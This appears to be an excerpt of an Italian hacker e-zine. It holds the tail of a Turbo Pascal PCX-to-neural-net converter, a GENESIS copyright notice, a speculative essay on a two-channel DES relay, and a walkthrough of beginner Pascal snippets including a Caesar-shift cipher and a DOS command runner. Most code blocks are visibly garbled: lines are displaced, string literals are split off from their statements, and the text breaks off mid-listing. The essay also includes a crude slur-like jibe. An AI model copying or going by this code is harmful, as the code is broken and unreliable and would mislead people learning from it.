Write(F2,Output_char)
ELSE
Write(F2,' ');
IF Char_count > Line_length THEN
begin
Writeln(F2);
Char_count := 0;
end;
Inc(Char_count);
end;
Close(F2);
end;
var
NNI : NNIptr;
procedure pcx_to_neural_net;
{ get a.PCX; display it; & convert it to txt for neural net. }
var
SPort
:
X, Y
:
XPt, YPt, RowPt :
S
:
Screenptr;
integer;
integer;
string;
begin
New(SPort,init);
WITH SPort^ DO
begin
Initialize;
Maxx := GetMaxx;
Maxy := GetMaxy;
SetViewPort(0,0,Maxx,Maxy,ClipOn);
SetTextStyle(DefaultFont, HorizDir, 1);
pcxReturn := pcxSetDisplay(PCX_type);
pcxReturn := pcxFileDisplay(PCX_file,0,0,0);
IF (pcxReturn = pcxSuccess) THEN
begin
Assign(F,Output_file_for_neural_net);
Rewrite(F);
GetViewSettings(ViewInfo); { coordinates of Viewport }
XPt
:= 0;
YPt
:= 0;
RowPt := 0;
WHILE RowPt <= ViewInfo.y2 DO
begin
WHILE XPt <= ViewInfo.x2 DO
begin
FOR Y := YPt to (YPt + 7) DO
begin
FOR X := XPt to (XPt + 7) DO
begin
PixelStatus := GetPixel(X,Y);
IF PixelStatus = 0 THEN
write(F,'.')
ELSE
write(F,'X');
end;
writeln(F);
end;
YPt := RowPt;
XPt := XPt + 8;
end;
XPt
:= 0;
RowPt := RowPt + 8;
YPt
:= RowPt;
end;
end;
Close(F);
end;
Dispose(SPort,done);
end; { pcx_to_neural_net}
begin { program body }
pcx_to_neural_net;
New(NNI, init);
WITH NNI^ DO
begin
SwapVectors;
exec('C:\COMMAND.COM','/C C:\BATCH\net');
SwapVectors;
IF DosError <> 0 THEN
Writeln('Dos error # ',DosError)
ELSE
Get_weights;
Output_characters;
Dispose(NNI, done);
end;
end.
*****************************************************************************
** ED ORA I GIUSTI COPYRIGHT: {now the right copyright}
** GENESIS;
Neural Systems Simulator
**
** Written by: Matt A. Wilson
([email protected])
**
Upinder S. Bhalla
([email protected])
**
John D. Uhley
([email protected])
**
David H. Bilitch
([email protected])
**
Mark E. Nelson
([email protected])
**
James M. Bower
([email protected])
**
** HELIOS compatibility modifications by :**
**
Michael D. Speight
([email protected])
**
** X11R4 upgrade modifications by:**
**
Randall D. Smith
([email protected])
**
** Copyright 1988, 1989 and 1990 by the California Institute of Technology
**
** Permission to use, copy, modify, and distribute this
** software and its documentation for any purpose and without
** fee is hereby granted, provided that the above copyright
** notice appear in all copies and that both that copyright
** notice and this permission notice appear in supporting
** documentation, and that the name of the California Institute
** of Technology not be used in advertising or publicity pertaining
** to distribution of the software without specific, written prior
** permission. The California Institute of Technology makes no
** representations about the suitability of this software for any purpose.
** It is provided "as is" without express or implied warranty.
**
*****************************************************************************
Continuiamo nel nostro lungo cammino e procediamo all'analisi di un altro
interessante idea che mi e' venuta in mente e che sto sperimentando con
alcuni amici [mit uni forever] allora come bhe sappiamo dicendola semplice
un sistema sicuro di trasmissione non esiste e credo mai esistera' e il des
ormai e' diventato vecchio e obsoleto non piu' in grado di reggere i tool e
gli apperecchi hardware che in pochi giorni rendono facile la decodifica di
questo algoritmo . Bhe cavolo come si puo' allora stare sicuri in questa rete
.. Bhe un hacker direbbe meglio cosi' e' comodo ... ma sto tentando essere
dalla parte dei sysadmin piu'bravi e dei ricercatori .
Prima di tutto un sitema sicuro di trasmissione com gia' visto si basa sulla
trasmissione su due canali da due apparecchi diversi come avviene per gli usa
e la russia che utilizzano aerei a distanza specificate per trasferire
importanti informazioni attraverso aerei che con l'apparecchiatura fornitale
utilizzano due canali : uno per la trasmissione del codice ed uno per le
informazzioni una volta verificato il codice stesso .
Bhe pensiamo di volere fare la stessa cosa sulla rete ... ci ho riflettuto e
non e'facile ma non impossibile... e sarebbe fattibile allora sviluppiamo il
modo e il codice per procedere.
Di che abbiamo bisogno , prima di tutto di due server dedicati al compito su
alta connettivita' [t3 o t1] entrambi devono avere solo 3 porte aperte :
la prima ad esempio telnet nel quale l'utente inserisce le informazioni e
ovvimanete il codice di algoritmo [des al momento ] e i ovviamente il suo
login / passwd [magari anke altre informazioni personali durante il logon
che solo il server conosce ... possibilissimo da implementare]
Bhe dopo questa operazione iniziale il server procede al salvataggio dei
dati su memoria di massa [hd] e procede alla sec fase.
la seconda porta serve al trasferimento del codice del server all'altro
server che la verifica e poi all'invio del codice utente che l'utente
destinatario del messaggio dovra'ricevere .Ora il passaggio codice e' completo
Il server procedera'ora' a aprire su un porta random che sara' comunicata al
software dell'utente che invia il messaggio e a quello che lo riceve. Il
messaggio inviato verra'cmq criptato in des e inviato al destinatario
Il server chiudera'ovvimante la porta aperta e cancellera'il codice dala
memoria di massa.
PROBLEMI A CUI E' DIFFICILE PROVVEDERE:
n.1 il codice utilizzato e' des
n.2 il tempo [lo scambio deve avvenire in tempo reale tra i due server ma
anche tra i due utenti ... il server potra' accettare solo un utente e
non piu' di uno per motivi legati ovviamente alla sicurezza]
n.3 la connessione tra i due server deve essere diretta e non passare per
altri pc altrimenti il fattore sicurezza e' zero.
IDEE CONSEGUITE:
per la n.3 internet e' difficle per la sua implementazione ma possibile
attraverso strutture adeguate [vedi P30000 hehehehe magari] ....
per la n.1 make another codez zcools .... HahAha not a good idea i think
that is more good than a codez that i can do HahAha.....
per la n.2 bhe questo secondo me e' giusto e credo che se anke puo' causare
disguidi aiuti in maniera forte la sicurezza... non avete tempo
aspettare che la vs spia di fiducia si colleghi allora cavoli
vostri hehehe.
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;)
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Ed ecco a voi il miglior coder, il pluripremiato e invidiato programmatore,
il pluriricercato da Bill GAYtes, il mitico crackatore...
...hihihi...
...ci avevate creduto...
...e invece no...sono sempre io...io chi?
...continuate a leggere e lo saprete presto...
Salve a tutti questo e' il vostro N0bodY88 che vi scrive questa diciamo
minidescrizione di alcune parti del codice che potete trovare tra gli allegati
sotto il nome di angela.pas (sera :).
Questo programma da me fatto non centra un benemrito caxxo con l'hacking ma
almeno centra un po' con la crittografia e soprattutto la programmazione.
Siccome il programma e' lungo (a sproposito imo) ho pensato di spiegare solo
le parti non intuibili (alla prima okkiata) e anke se so che molti rideranno
di questa mia "creazione" io so che hacking e' uno stato mentale e implica
creativita' e tanta immaginazione quindi....immaginate che sia un bel
programma fatto da un creativo (pensate che rido di me perfino io stesso
hihihi). Allora il primo spezzone che prenderemo in esame sara' quello utile
(?) al capovolgimento di una frase e/o una parola.
Per capovolgere una frase uso un semplice algoritmo che consiste nel leggere
la lunghezza della frase con la funzione Length, dopodiche' si fa un ciclo
che va da 1 alla lunghezza totale della frase e assegniamo a una nuova
variabile azzerata prima del ciclo (x evitare problemi se si riusa questa
parte del programma) una alla volta tutte le lettere, gli spazi e i numeri
assegnando prima l'ultima lettera, poi la penultima, poi la terzultima e
cosi' via. Per ottenere questo basta che alla lunghezza totale togliamo la I
che da 1 andra' in crescendo. Alla fine non ci rimarra altro da fare che
stampare la nostra nuova variabile contenente tutti i valori della frase di
'capov', solo che...capovolti :)
--- INIZIO CODICE --capov:=''; olta:='';
GotoXY(10,10); writeln ('Scrivi la frase da capovolgere. ');
GotoXY(10,12); readln (capov);
J:=length(capov);
olta:='';
FOR I:=1 TO J DO
BEGIN
olta:=olta+capov[j-I];
END;
GotoXY(10,15);
writeln ('La frase capovolta e'': ',capov[J]+olta);
GotoXY(10,17);
readln;
--- FINE CODICE --La seconda funzione di angela e' semplicissima e serve x crearsi un nuovo
alfabeto derivante da quello tradizionale. In pratica cio' che ho fatto e'
stato richiedere un numero compreso tra 1 e 26 e riempire un array con le
stesse caratteristiche di quello contenente le 26 lettere dell'alfabeto con
un criterio dato dal numero ottenuto in input. Se ad esempio io inserisco il
numero 4 il sotto-programma mi sposta nel secondo array prima le lettere dal
numero scelto, quindi dal 4ø, fino al 26ø poi successivamente vi aggiungeva
le lettere che andavano dalla A fino al numero scelto meno uno (4-1). In
questa maniera noi possiamo cioe' crearci un alfabeto nuovo nuovo da poter
usare in un ns futuro programma di criptazione.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,10); writeln ('Dammi un numero da 1 a 26 ');
GotoXY(10,12); readln (X);
for I:=1 to (26-X+2) do
begin
data2[I-1]:=data1[I+X-2];
end;
for I:=1 to (X-1) do
begin
data2[I+26-X]:=data1[I-1];
');
scelto: ');
end;
GotoXY(10,16); writeln ('Vediamo come sarebbe l''alfabeto se
GotoXY(10,17); writeln ('iniziasse x la lettera che hai
GotoXY(10,20);
for I:=1 to 26 do
begin
write (data2[I-1]);
end;
readln;
end;
--- FINE CODICE --Qui non c'e' nulla da spiegare ho solo utilizzato il comando FindFirst
passandogli come argomenti una lista di file (prima .EXE e poi .PAS).
Per maggiori informazioni cercate FindFirst nella guida di TP.
--- INIZIO CODICE --begin
clrscr;
GotoXY(1,5); writeln ('ELENCO FILE .EXE: ');
FindFirst('*.EXE', Archive, DirInfo);
GotoXY(1,7);
while DosError = 0 do
begin
Writeln(DirInfo.Name);
FindNext(DirInfo);
end;
readln;
clrscr;
GotoXY(1,5); writeln ('ELENCO FILE .PAS: ');
FindFirst('*.PAS', Archive, DirInfo);
GotoXY(1,7);
while DosError = 0 do
begin
Writeln(DirInfo.Name);
FindNext(DirInfo);
end;
readln;
end;
--- FINE CODICE --Questo spezzone utilizza la funzione Randomize e serve (se non l'avete ancora
capito =) a scegliere una lettera a caso. Il programma randomizza la variabile
I da 1 a 26 e mostra la lettera estratta continuamente cambiandola con un
altra sempre random fino a che (per fermarsi su una delle lettere "casuali")
utilizziamo la forma "until KeyPressed" cioe mostriamo le lettere finche' non
viene premuto un qualsiasi tasto. Stupida cosa che potbbe tornare utile ai
novelli e/o futuri programmatori.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,8); write ('Per fermare e vedere la lettera
random schiacciare la barra');
Randomize;
repeat
begin
GotoXY(10,10);
I:=random(26);
write ('La lettera estratta a caso risulta
essere la ',data1[I]);
end;
until KeyPressed;
readln;
end;
--- FINE CODICE --Semplice e inutile programmino che memorizza una frase x poi cancellarne una
parte da noi delimitata. Esempi noi scriviamo una frase tipo
caio maz!
123456789
poi diciamo che vogliamo cancellare dalla parola le lettere dalla 3 alla 7.
Il risultato sara' quindi
caz!
1234
Come dicevo all'inizio inutile...forse...di sicuro...mah...chissa'...
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,6); writeln ('Scrivi una frase di almeno tre parole:
');
GotoXY(10,8); readln (canc);
repeat
GotoXY(10,10); writeln ('Dammi un numero minore della
lunghezza della frase: ');
GotoXY(10,12); readln (I);
until I<Length(canc);
repeat
GotoXY(10,14); writeln ('Dimmi quante lettere cancellare: ');
GotoXY(10,16); readln (J);
until (j<(length(canc)-I));
Delete(canc,I,J);
GotoXY(10,18); Writeln('La frase con le lettere tolte risulta
essere: ');
GotoXY(10,20); Writeln(canc);
readln;
end;
--- FINE CODICE --E mentre Dante qui accanto a me va in delirio perche' leggendo una e-zine
americana ha trovato un errore di allinemanto io vo avanti...il seguente
pezzo di codice affronta un problema che mi era stato presentato da un amico
che non sapeva programmare e che diceva che io ero bravo, dato che sapevo lo
accatiemmeelle....cmq a parte le premesse lo scopo di tal agglomerato di
codice e' di contare in una frase le vocali, le consonanti, le maiuscole,
le minuscole, i numeri e gli spazi. Anke questo e' fatto solo x vedere come
affrontare un problema di questo genere ma come qualsiasi problema basta
pensarci nu poco su e poi andare giu' di nobotesting (come la chiamo la fase
in cui io testo i miei prog del cax).
--- INIZIO CODICE --begin
clrscr;
voc:=0; cons:=0; maiusc:=0; minusc:=0; spazi:=0; numfrase:=0;
GotoXY(10,6); writeln ('Scrivi una frase: ');
GotoXY(10,8); readln (frase);
for i:=1 to (length(frase)+1) do
begin
for j:=1 to 5 do
begin
if ((frase[i-1])=vocali[J-1]) then
begin
voc:=voc+1;
minusc:=minusc+1;
end;
if ((frase[i-1])=(upcase(vocali[J-1]))) then
begin
voc:=voc+1;
maiusc:=maiusc+1;
end;
end;
if ((frase[i-1])=' ') then
begin
spazi:=spazi+1;
end;
for x:=1 to 10 do
begin
if ((frase[i-1])=numeri[x-1]) then
begin
end;
then
numfrase:=numfrase+1;
end;
end;
for i:=1 to (length(frase)+1) do
begin
for J:=1 to 21 do
begin
if (frase[i-1]=consonanti[J-1]) then
begin
cons:=cons+1;
minusc:=minusc+1;
end;
if ((frase[i-1])=(upcase(consonanti[J-1])))
begin
end;
',voc);
sono ',cons);
',maiusc);
',minusc);
',spazi);
',numfrase);
end;
--- FINE CODICE ---
end;
cons:=cons+1;
maiusc:=maiusc+1;
end;
GotoXY(10,11); writeln ('Le vocali nella tua frase sono
GotoXY(10,12); writeln ('Le consonanti nella tua frase
GotoXY(10,13); writeln ('Le maiuscole nella tua frase sono
GotoXY(10,14); writeln ('Le minuscole nella tua frase sono
GotoXY(10,15); writeln ('Gli spazi nella tua frase sono
GotoXY(10,16); writeln ('I numeri nella tua frase sono
GotoXY(10,18); readln;
In queste poche righe che seguono viene richiesta l'immissione di una
qualsiasi lettere, numero, simbolo, carattere o insieme di caratteri i quali
una volta immessi andranno a riempire lo schermo fino a che noi non pigieremo
un qualsiasi tasto (con la funzione gia' descritta sopra "until keypressed").
Tipico esempio del ciclo (quasi) infinito (anke se da questo si esce ;).
Le due combinazione consigliate rendono lo schermo una scacchiera su cui si
puo' giocare benissimo a scacchi se solo avete abbastanza pedine per riempire
anke solo una fila...
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,10); writeln ('Scrivi quello che vuoi: ');
GotoXY(10,12); writeln ('[ Se vuoi un consiglio prova a scrivere
solo ALT+206 o ALT+197 ]');
GotoXY(10,14); readln (quellochevuoi);
repeat
write (quellochevuoi);
until keypressed;
end;
--- FINE CODICE --Questa funzione permette di eseguire un programma con alcuni parametri anke
se non molte volte mi e' andato a buon fine, nonostante il codice sia (credo)
pulito.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,10);
GotoXY(10,12);
GotoXY(10,14);
');
GotoXY(10,16);
writeln('Programma da eseguire: ');
readln (prog);
write('Parametri da passare al programma ',prog,' :
readln(par);
fine.');
GotoXY(10,18); writeln('Adesso vediamo se funziona...');
SwapVectors;
Exec(prog,par);
SwapVectors;
clrscr;
GotoXY(10,10); writeln ('...speriamo sia andato tutto a buon
if (doserror<>0) then
begin
GotoXY(10,12);
writeln('Numero di errore di dos: ',DosError);
end
else
begin
GotoXY(10,14); writeln('Esecuzione andata a buon
fine...forse.');
end;
readln;
end;
--- FINE CODICE --Siccome nella funzione sopra qualcosa puo' non funzionare e puo' esserci dato
in output un errore di dos soot forma di numero o pensato di mettere nella
opzione successiva una lista dei + comuni errori del dos con una breve e credo
intuibile spiegazione.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,3);
SPIEGAZIONI ');
GotoXY(10,6);
GotoXY(10,7);
GotoXY(10,8);
GotoXY(10,9);
GotoXY(10,10);
GotoXY(10,11);
GotoXY(10,12);
GotoXY(10,13);
GotoXY(10,15);
perche'' il
');
GotoXY(10,16);
riportare degli
');
GotoXY(10,17);
altro e cosi''
');
GotoXY(10,18);
perche'' non funzia.');
GotoXY(10,20);
end;
--- FINE CODICE ---
writeln (' LISTA ERRORI DOS E LORO
writeln
writeln
writeln
writeln
writeln
writeln
writeln
writeln
writeln
(' 2
(' 3
(' 5
(' 6
(' 8
('10
('11
('18
('Ho
--> File not found
');
--> Path not found
');
--> Access denied
');
--> Invalid handle
');
--> Not enough memory
');
--> Invalid environment ');
--> Invalid format
');
--> No more files
');
voluto mettere questa lista
writeln ('programma scelto con l''8 puo''
writeln ('errori dovuti a poca memoria o
writeln ('da questa lista potete capire
readln;
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
QUESTA FUNZIONE VIENE ESEGUITA SENZA PROBLEMI SOLO SE IL FILE ANGELA E'
CONTENUTO NELLA DIRECTORY C:\WINDOWS\COMMAND [se in modalita' windows] O
NELLA DIRECTORY C:\DOS [se in modalita' dos] ... O ALMENO CREDO =)
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Ovviamente ogni buon consiglio atto a migliorare il prog e la mia conoscenza
stessa e' mooooooooooolto ben accetto, come le critiche d'altronde.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,10); writeln ('Dammi il comando dos che vuoi eseguire:
');
GotoXY(10,12); readln (comando);
if (comando<>'') then
begin
comando:='/C ' + comando;
swapvectors;
exec(getenv('COMSPEC'), comando);
swapvectors;
if (DosError<>0) then
begin
GotoXY(10,14); writeln ('Non si riesce a far
eseguire command.com');
GotoXY(10,16); readln;
end
end;
readln;
end;
--- FINE CODICE --Questa "utility" (uaaaaaaaaahahahhaha) mostra le linee del tuo dos caricate
in memoria nel momento dell'esecuzione del programma angela.
--- INIZIO CODICE --begin
clrscr;
for i:=1 to envcount do
writeln(envstr(i));
readln;
end;
--- FINE CODICE --Con questo pezzo si puo' leggere la data odierna e cambiarne il giorno il mese
e l'anno (ovviamente...direte voi :DDDDDDDD).
--- INIZIO CODICE --begin
clrscr;
getdate(anno,mese,giorno,ggsettimana);
GotoXY(10,6);
writeln('Oggi e'' esattamente ',giorni[ggsettimana],'
',giorno:0, '/', mese:0, '/', anno:0);
GotoXY(10,8); readln;
anno:=0; mese:=0; giorno:=0;
GotoXY(10,10); writeln ('Vuoi cambiare la data ? (S/N o
s/n)');
GotoXY(10,12); readln (risposta);
if (risposta='s') or (risposta='S') then
begin
clrscr;
GotoXY(10,3);
writeln ('ATTENZIOME se immettete dati errati la data non
variera''.');
GotoXY(10,5);
writeln ('Dammi il nuovo giorno in numeri : ');
GotoXY(10,7);readln (giorno);
GotoXY(10,9);
writeln ('Dammi il nuovo mese in numeri: ');
GotoXY(10,11);readln (mese);
GotoXY(10,13);
writeln ('Dammi il nuovo anno in numeri: ');
GotoXY(10,15);readln (anno);
setdate(anno,giorno,mese);
GotoXY(10,17);
writeln ('Ora la data e'' impostata sul seguente
giorno:');
GotoXY(10,19);
getdate(anno,mese,giorno,ggsettimana);
writeln(giorni[ggsettimana],' ',giorno:0, '/', mese:0,
'/', anno:0);
GotoXY(10,21); Readln;
end;
end;
--- FINE CODICE --Stessa cosa della funzione precedente solo che qui si puo' visualizzare e poi
eventualmente modificare l'ora, i minuti, i secondi e i centesimi di secondo.
--- INIZIO CODICE --begin
s/n)');
end;
--- FINE CODICE ---
clrscr;
risposta:='n';
gettime(ore,minuti,secondi,centesimi);
GotoXY(10,6);
writeln('Adesso sono esattamente le ',leadingzero(ore),
':',leadingzero(minuti),':',leadingzero(secondi),
'.',leadingzero(centesimi));
GotoXY(10,8); readln;
GotoXY(10,10); writeln ('Vuoi cambiare l''ora ? (S/N o
GotoXY(10,12); readln (risposta);
if (risposta='s') or (risposta='S') then
begin
clrscr;
GotoXY(10,6); writeln ('Dammi il primo dato: ');
GotoXY(35,6); readln (d1);
GotoXY(10,8); writeln ('Dammi il secondo dato: ');
GotoXY(35,8); readln (d2);
GotoXY(10,10); writeln ('Dammi il terzo dato: ');
GotoXY(35,10); readln (d3);
GotoXY(10,12); writeln ('Dammi il quarto dato: ');
GotoXY(35,12); readln (d4);
settime(d1,d2,d3,d4);
GotoXY(10,14);
writeln('Adesso l''ora e'' impostata sulle '
,leadingzero(ore),':',leadingzero(minuti),
':',leadingzero(secondi),'.',leadingzero(centesimi));
GotoXY(10,16); readln;
end;
Dal nome stesso della funzione memavail si capisce che tramite essa si puo'
vedere la quantita' di memoria available (quindi =disponibile) in un dato
momento.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,10); writeln ('Hai ben ',memavail, ' byte
liberi.');
GotoXY(10,12); writeln ('Il blocco libero piu'' grande e'' di
',maxavail,' byte.');
GotoXY(10,14); readln;
end;
--- FINE CODICE --Il seguente spezzone serve a sommare + numeri pari e + numeri dispari dandone
poi un rapporto alla fine (lo so manca la somma di tutti i numeri pari e
dispari ma nessuno e' perfetto e alle 1.32 di sabato notte con dante che sta
a fianco a scrivere l'altro articolo non mi sento le forze x cercare il cd con
su pascal per ricompilarlo e fare il nuovo exe...
--- INIZIO CODICE --begin
clrscr;
x:=5;
repeat
clrscr;
repeat
GotoXY(10,3); writeln('Dammi il numero degli addendi:
');
GotoXY(10,4); readln (n);
until (n>0);
I:=0; sommap:=0; sommad:=0; contap:=0; contad:=0;
repeat
GotoXY(10,x+1); writeln('Dammi un numero da
sommare: ');
GotoXY(10,x+2); readln(numero);
controllo:=numero;
x:=x+2;
if odd(numero) then
begin
GotoXY(16,x);
writeln ('...questo numero e'' -->
Dispari');
end
else
begin
GotoXY(16,x);
writeln ('...questo numero e'' -->
Pari');
repeat
uguale a
',sommap);
',contap);
uguale a
',sommad);
',contad);
numeri? (S/N o s/n)');
end;
controllo:=controllo-2
until (controllo=0) or (controllo=1);
if (controllo=0) then
begin
sommap:=sommap+numero;
contap:=contap+1;
end
else
begin
sommad:=sommad+numero;
contad:=contad+1;
end;
i:=i+1;
GotoXY(10,x+1); until i=n;
readln;
clrscr;
GotoXY(10,4); writeln('La somma dei numeri pari e''
GotoXY(10,5); writeln('I numeri pari sono uguali a
GotoXY(10,6); writeln('La somma dei numeri dispari e''
GotoXY(10,7); writeln('I numeri dispari sono uguali a
GotoXY(10,9); writeln('Vuoi calcolare la somma di altri
GotoXY(10,11); readln(risp);
until (risp='n') or (risp='N');
end;
--- FINE CODICE --Questa (a seconda di tutti i miei beta-tester...cioe'...secondo me...) e una
delle funzioni + belle e consiste esattamente nel mostrare a video tutti i
codici ascii e i relativi valori ordinali cosicche' quando vi serve un codice
ascii e non sapete dove sbattere la testa ricordatevi di angela...
--- INIZIO CODICE --begin
clrscr;
x:=5;
GotoXY(6,3); writeln ('Questa e'' la lista dei codici ascii
con relativi valori ordinali: ');
for i:=1 to 255 do
begin
ascii[i]:=(chr(i));
ascii2[i]:=(ord(i));
end;
clrscr;
for i:=1 to 25 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo''
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=25 to 50 do
begin
writeln ('Il carattere ascii ',ascii[i],' si puo''
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=50 to 75 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=75 to 100 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=100 to 125 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=125 to 150 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=150 to 175 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=175 to 200 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=200 to 225 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=225 to 250 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
clrscr;
for i:=250 to 255 do
begin
writeln ('Il
ottenere usando ALT+',ascii2[i]);
end;
readln;
end;
--- FINE CODICE ---
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
carattere ascii ',ascii[i],' si puo''
Piccolo programmino che cripta una frase con il metodo spiegato in un mio
precedente articolo sui fondamenti della crittografia (metodo del cifrario
additivo puro e semplice) nel quale potete trovare la spiegazione teorica
di questo caso. Per la parte pratica poi si usa una semplice sostituzione
delle lettere guardando l'indice della lettera in chiaro nell'alfabeto
normale e copiandone in un file temporaneo (che conterra' tutta la frase
criptata) la lettera equivalente dell'alfabeto da noi scelto e creato tenendo
conto dell'indice come dire...esportato dal primo al secondo alfabeto).
Per qualsiasi chiarimento sono pronto a rispondere in mail o se ne verra'
fatta richiesta (scritta ovviamente hihihi) sul prox numba della e-zinnnne.
--- INIZIO CODICE --begin
clrscr;
GotoXY(10,4); writeln ('Dammi un numero da 1 a 26 ');
GotoXY(10,5); readln (X);
for I:=1 to (26-X+2) do
begin
lettere2[I-1]:=lettere[I+X-2];
end;
for I:=1 to (X-1) do
begin
lettere2[I+26-X]:=lettere[I-1];
end;
GotoXY(10,7); writeln ('Ora vediamo il confronto tra
l''alfabeto normale e');
GotoXY(10,8); writeln ('quello che inizia x la lettera che hai
scelto: ');
GotoXY(10,9);
for I:=1 to 26 do
begin
write (lettere[I-1]);
end;
GotoXY(10,10);
for I:=1 to 26 do
begin
write (lettere2[I-1]);
end;
readln;
GotoXY(10,12); writeln ('Ora proviamo a criptare qualcosa.
Scrivi una frase');
GotoXY(10,13); readln (cri);
nas:=''; c:=0;
for i:=1 to Length(cri)+1 do
begin
for j:=1 to 26 do
begin
if cri[i-1]=upcase(lettere[j-1]) then
begin
nas:=nas+(upcase(lettere2[j-1]));
end
else
begin
c:=c+1;
end;
if cri[i-1]=lettere[j-1] then
begin
nas:=nas+lettere2[j-1];
end
else
begin
c:=c+1;
end;
if cri[i-1]=' ' then
begin
nas:=nas+' ';
j:=26;
end
else
begin
c:=c+1;
end;
end;
if c=78 then
begin
nas:=nas+cri[i-1];
c:=0;
end;
c:=0;
end;
GotoXY(10,16); writeln ('Questa e'' la tua frase/parola
criptata col nuovo alfabeto:');
GotoXY(10,18); writeln (nas);
nas2:=nas;
GotoXY(10,20); readln;
end;
--- FINE CODICE --Stessa cosa del precedente sotto-mini-programma con la differenza che se prima
si criptava un afrse adesso la si decripta...
--- INIZIO CODICE --begin
clrscr;
nas:=nas2;
if nas='' then
begin
GotoXY(8,6);
writeln ('Devi eseguire il punto 17 prima di questo
punto.');
GotoXY(8,7); readln;
end
else
begin
GotoXY(8,3);
writeln ('Ora vediamo se riusciamo a decriptare la
seguente frase:');
GotoXY(8,5); writeln (nas);
GotoXY(8,6); readln;
repeat
GotoXY(8,8);
writeln ('Inserisci un numero con il quale provare
a decriptare la frase: ');
GotoXY(8,9); readln (x);
until (x>0) and (x<27);
for I:=1 to (26-X+2) do
begin
lettere2[I-1]:=lettere[I+X-2];
end;
for I:=1 to (X-1) do
begin
lettere2[I+26-X]:=lettere[I-1];
end;
GotoXY(8,11); writeln ('Ora vediamo il solito
confronto tra l''alfabeto normale e');
GotoXY(8,12); writeln ('quello che inizia x la
lettera che hai scelto: ');
GotoXY(8,13);
for I:=1 to 26 do
begin
write (lettere[I-1]);
end;
GotoXY(8,14);
for I:=1 to 26 do
begin
write (lettere2[I-1]);
end;
GotoXY(8,15); readln;
GotoXY(8,16); writeln ('Ora proviamo a decriptare
la frase immessa al punto 17: ');
cri:=''; d:=0;
for i:=1 to Length(nas)+1 do
begin
for j:=1 to 26 do
begin
nas[i-1]=upcase(lettere2[j-1]) then
if
begin
cri:=cri+(upcase(lettere[j-1]));
end
else
begin
d:=d+1;
end;
if nas[i-1]=lettere2[j-1] then
begin
cri:=cri+lettere[j-1];
end
else
begin
d:=d+1;
end;
if nas[i-1]=' ' then
begin
cri:=cri+' ';
j:=26;
end
else
begin
d:=d+1;
end;
end;
if d=78 then
begin
cri:=cri+nas[i-1];
d:=0;
end
else if (d<>78) then
begin
d:=0;
end;
end;
--- FINE CODICE ---
end;
end;
GotoXY(8,18); writeln (cri);
GotoXY(10,19); readln;
Sulla prossima parte no comment.
--- INIZIO COMMENTO --begin
clrscr;
GotoXY(8,2); writeln
GotoXY(8,3); writeln
alcune ore di studio');
GotoXY(8,4); writeln
base degli Help che');
GotoXY(8,5); writeln
volete dirmi che');
GotoXY(8,6); writeln
tempo, l''avreste fatto');
GotoXY(8,7); writeln
ditemelo che tanto lo');
GotoXY(8,8); writeln
GotoXY(8,9); writeln
e la poca, scarsa e complessa');
GotoXY(8,10); writeln
libreria Graph non mi funzia quindi...');
GotoXY(8,11); writeln
corretto molti degli errori presenti');
GotoXY(8,12); writeln
assicuro che non ce ne siano');
GotoXY(8,13); writeln
(' NOTE DI N0bodY88');
(' Questo programma e'' frutto di
(' del PASCAL fatte solamente sulla
(' ci sono in Turbo Pascal, quindi se
(' voi ci avreste messo meta'' del
(' meglio e senza errori...beh...non
